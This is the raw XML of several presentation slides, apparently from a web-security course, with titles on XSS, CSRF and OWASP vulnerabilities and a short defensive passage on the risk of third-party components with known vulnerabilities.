        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="213706617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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSS/XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{092A7680-8F45-4963-8426-7223140C9D87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3409950" y="671512"/>
            <a:ext cx="5372100" cy="5514975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="273566582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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSS/XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{073DA859-87F7-46A0-81E4-835C187BF5C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3414712" y="800100"/>
            <a:ext cx="5362575" cy="5257800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="108946209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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSS/XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{CB101F0A-2CB7-4DFC-A836-B7E3409A4E6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3686175" y="619125"/>
            <a:ext cx="4819650" cy="5619750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21398809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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{06879F95-C14C-406E-B7A2-205618800AAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1362075" y="228600"/>
            <a:ext cx="8172450" cy="4676775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="264346748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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{905F61DF-7D88-4EE4-8D3A-C3C75D95F0B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3805237" y="671512"/>
            <a:ext cx="4581525" cy="5514975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="85697644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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP VULNERABILITIES</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="3892168"/>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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="4000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Using Components with Known Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-GB" sz="4000" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="4000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>No matter how secure your own code is, attackers can exploit APIs, dependencies and other third-party components if they are not themselves secure.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-GB" sz="4000" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="4000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A static analysis accompanied by a software composition analysis can locate and help neutralize insecure components in your application.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="277044152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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Using components with known vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{17767634-4577-4704-91F9-D97CB2A014CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3652837" y="1042987"/>
            <a:ext cx="4886325" cy="4772025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="317008385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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP VULNERABILITIES</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
